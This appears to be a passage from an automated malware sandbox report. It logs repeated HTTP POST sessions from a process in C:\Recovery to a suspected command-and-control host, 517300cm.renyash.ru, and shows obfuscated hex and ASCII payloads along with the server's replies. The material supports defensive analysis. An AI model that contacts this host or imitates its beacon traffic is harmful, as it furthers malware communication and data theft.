27 3b 2f 41 23 10 23 07 27 15 32 52 26 1d 30 1f 20 2e 25 51 29 2e 3e 04 2c 01 30 5e 2f 27 0e 5e 2b 29 2b 51 0e 10 22 52 30 2d 29 07 29 3d 27 1f 24 31 3f 0a 3e 59 2c 04 25 05 2f 0a 28 39 2c 54 27 17 30 10 34 01 02 12 3c 14 28 58 30 01 22 0e 3d 38 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a Data Ascii: 98!1&<3Q116!X;>,B#9<-!!^6Y+Z022&<6&!]$[$*6X$X3';/A##'2R&0 .%Q).>,0^/'^+)+Q"R0-))='$1?>Y,%/(9,T'04<(X0"=8 \.-R>TP
Jan 9, 2025 18:13:27.355011940 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	50010	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:26.806171894 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:27.159154892 CET	1012	OUT	Data Raw: 50 57 5b 54 58 41 55 56 59 58 51 54 5b 57 57 54 5f 57 58 58 52 53 5a 48 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PW[TXAUVYXQT[WWT_WXXRSZH^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#_)3. /9=#4-;#Y &;>)8V!-2V-T$+$4?(*'\"/Y.(
Jan 9, 2025 18:13:27.268471956 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:27.555624008 CET	811	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LjYMAfTPPRS5ChRzAAmsvfa04w8QVtZzX%2BJz1KhAIp%2BLePEgEGljYyrpS93Inc7F%2By%2B9bTsnMQR5Eaao1FSExUdMDNldMw0Oecnqf29Bbj3GGwvKg3Wf5j5fq54jy%2F%2FgZa39lJDc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60ed92f750c90-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3210&min_rtt=1673&rtt_var=3703&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=104472&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	50018	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:27.677453041 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:13:28.034362078 CET	1012	OUT	Data Raw: 50 5f 5b 5d 5d 40 50 52 59 58 51 54 5b 5d 57 55 5f 50 58 5c 52 53 5a 46 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P_[]]@PRYXQT[]WU_PX\RSZF^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z #>4<!=\-(#X#%>:$W"-V1)T1$7#)'\"/Y.
Jan 9, 2025 18:13:28.152210951 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:28.394387007 CET	808	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GnakXSLzTLooudOZFQ%2F125hrtw15b0GDEuna8A8TAFOYHsg%2BZMG2LoLmAZ28UOFJ%2Fppa%2FuC4fiXkk9XtPbs%2BhY8UDT3UrLlYB75CFIOo5ircWeLwdqulNepxdTIRqA0Kiq2SUtt3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60edebf64c45e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3543&min_rtt=1519&rtt_var=4618&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=82420&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	50024	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:28.518418074 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:28.863109112 CET	1012	OUT	Data Raw: 50 55 5b 5d 5d 43 55 53 59 58 51 54 5b 50 57 54 5f 5d 58 55 52 5d 5a 43 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PU[]]CUSYXQT[PWT_]XUR]ZC^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z )3. /.]>3;$#7]>)<R6>)S%9T&;0!?(*'\"/Y.4
Jan 9, 2025 18:13:28.974652052 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:29.228713989 CET	804	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vRfoQ6r0fAqax6l4coE49cv2svcumrIL1Zu0R90ZibvKdGd%2BQ7dFiVAnvXKZEm3YjsBze8GjYyqBRE0nVQoYd5wEh0kNuG2XhMYd%2BwEQzV1KQVUZT2w%2FdC3p8yFlQ4vpZrfZCLl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60ee3dcd20f4d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4670&min_rtt=1813&rtt_var=6395&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=59171&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	50030	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:29.447407961 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:29.799890041 CET	1012	OUT	Data Raw: 55 54 5b 5a 58 43 55 55 59 58 51 54 5b 5d 57 5c 5f 56 58 54 52 5a 5a 47 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UT[ZXCUUYXQT[]W\_VXTRZZG^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z #>#.>3#\,^ 7%+]) S"-&&U&74+'\"/Y.
Jan 9, 2025 18:13:29.986092091 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:30.247826099 CET	815	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Kq0XNPnv0HYjhQSlbt%2Bl%2Bu0ZuCPa14QcxhyiWwwqJ07A%2FtN5zK6M%2BaIcxzpRDXwzWg5QG6o6eNorY%2Fdxg5MKY6ipcRMW9hG9gi6qk%2BoUS51cRgwIJcgrryakp%2F1sdSLj0wJpg%2Bf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60eea2e706a55-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7635&min_rtt=1778&rtt_var=12380&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=30020&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	50036	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:30.380183935 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:30.737354040 CET	1012	OUT	Data Raw: 55 53 5b 55 5d 47 55 5e 59 58 51 54 5b 54 57 55 5f 56 58 58 52 58 5a 43 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: US[U]GU^YXQT[TWU_VXXRXZC^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z ))X ])0#Z,#4?)9;65V&0:&'Z ?)'\"/Y.$
Jan 9, 2025 18:13:30.830621004 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:31.007013083 CET	805	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tBZd5rZKlhuRK7palZch37mXko%2F9c6L04LFNDDLYqWaqx3SL2eUTiR%2BKNuEEohDoJjT8Ue85a4Mqegas555ovhd6CT1ZgnLi1XN%2BB7wIBbpGigFVzH6MccKT2D7Xbej1DZzxqpLu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60eef78004390-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6704&min_rtt=1682&rtt_var=10675&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=34878&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	50042	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:31.130754948 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:31.487361908 CET	1012	OUT	Data Raw: 55 55 5e 5e 58 41 50 55 59 58 51 54 5b 56 57 52 5f 55 58 5f 52 5a 5a 46 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UU^^XAPUYXQT[VWR_UX_RZZF^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z *7<1> #Y/8<4&;[=:T6=V% T1;^4,('\"/Y.,
Jan 9, 2025 18:13:31.645390034 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:31.833555937 CET	805	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XmQsd5qHk3D41bbYnHY9c%2FIpy3qqAECekF%2B9PLBjJnUuIxY0JiS83FL2n3130dtB8UL5bjsGrv40pBhCvDqi2fnJZWtBtHs%2BakqVepdwOwOHsHqET89XiOZzuysvFmOjeUhgtmOS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60ef48a1e4407-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9190&min_rtt=2425&rtt_var=14439&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=25819&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	50043	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:32.023644924 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	50049	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:32.368732929 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:32.721724033 CET	1292	OUT	Data Raw: 50 56 5e 5b 58 41 55 52 59 58 51 54 5b 56 57 53 5f 55 58 5c 52 5f 5a 40 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PV^[XAURYXQT[VWS_UX\R_Z@^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#)#: >Y>X/+0#'\=35->&0%&X ?]('\"/Y.,
Jan 9, 2025 18:13:32.981329918 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:33.227612019 CET	957	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i%2Fy8CLcTdBZtDaPjr35ov%2BSEwEx2Fh0j6PyRE1wA767rGrhRcFjrs%2FxK03QEvkEV1rbM8cdStBF7ilFfH5ADpS%2FnZkCzMGaHO6Y4IT5WWSCXO9v6AQ2JFhR1%2Bguus5cYuK7vTcJK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60efcce103344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8696&min_rtt=5390&rtt_var=8634&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1617&delivery_rate=45852&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 21 5f 25 43 33 54 30 2f 2f 50 25 1f 2d 50 35 31 00 58 2e 2e 01 19 22 3a 20 06 2d 21 2d 10 20 3f 2b 5a 30 0b 39 1b 31 12 3b 50 36 36 21 5d 01 12 24 5c 27 17 3e 5d 27 2d 34 12 32 38 06 19 34 07 37 02 26 2b 2e 50 25 0a 20 11 36 04 21 1d 29 13 29 5b 2d 3f 30 5e 2c 37 06 13 3e 29 2b 51 0e 10 22 1b 27 5b 3d 06 3f 00 33 5c 24 32 12 1d 2a 2f 33 58 26 5a 30 1e 3e 07 3c 56 27 00 38 10 37 11 27 07 2b 03 38 59 27 16 29 56 2a 12 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98!_%C3T0//P%-P51X..": -!- ?+Z091;P66!]$\'>]'-42847&+.P% 6!))[-?0^,7>)+Q"'[=?3\$2/3X&Z0><V'87'+8Y')V \.-R>TP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	50050	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:32.489368916 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:32.846810102 CET	1012	OUT	Data Raw: 50 53 5e 5e 5d 40 55 53 59 58 51 54 5b 52 57 5c 5f 53 58 54 52 5c 5a 44 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PS^^]@USYXQT[RW\_SXTR\ZD^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#[>05] /2_3#\8804#Z:5=)R22&]<4/$(*'\"/Y.
Jan 9, 2025 18:13:32.985371113 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:33.158469915 CET	806	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NdBDvQClhenRIe%2FTchCj8jia5GtsnZZkf%2BtmRXg2EvoweRUsMqq131qEubzV6DeVK3RgPYaSXNdeG0bYgZvJoWuQWxNcxkeEnZZXWDJOMeExq0%2F7YslwvSZxTnTDDNoPFw2Dp%2BAc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60efcdfe80f3b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4387&min_rtt=1668&rtt_var=6064&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=62329&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	50056	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:33.290235996 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:13:33.643590927 CET	1012	OUT	Data Raw: 55 57 5b 5b 5d 42 50 52 59 58 51 54 5b 5c 57 54 5f 56 58 5e 52 5c 5a 40 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UW[[]BPRYXQT[\WT_VX^R\Z@^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#=5^ ,? $;^?#'^+*R -2!&!,7('\"/Y.
Jan 9, 2025 18:13:33.753385067 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:34.018043041 CET	819	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lKv4GT9dL4AP%2BM4Hz4suzEz75%2B4TqUIOTa%2BvRM%2BbM1FQRpWj4FiWVloa5JM2s%2BL0CFkSPRDx6MGapXrNxE5fXYMdmw1cPE0%2B1%2FO3EhVbD94nuPp%2BvqzwW8HvlR603dt%2BVTO%2BREzS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f01ab287c87-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3488&min_rtt=1973&rtt_var=3770&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=103582&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	50062	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:34.144354105 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:34.503066063 CET	1012	OUT	Data Raw: 50 57 5b 5c 58 47 55 54 59 58 51 54 5b 5c 57 54 5f 51 58 5a 52 5b 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PW[\XGUTYXQT[\WT_QXZR[ZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z +#\#=#$884&$=\;"=R%=&?Y4/](:'\"/Y.
Jan 9, 2025 18:13:34.617136002 CET	25	IN	HTTP/1.1 100 Continue
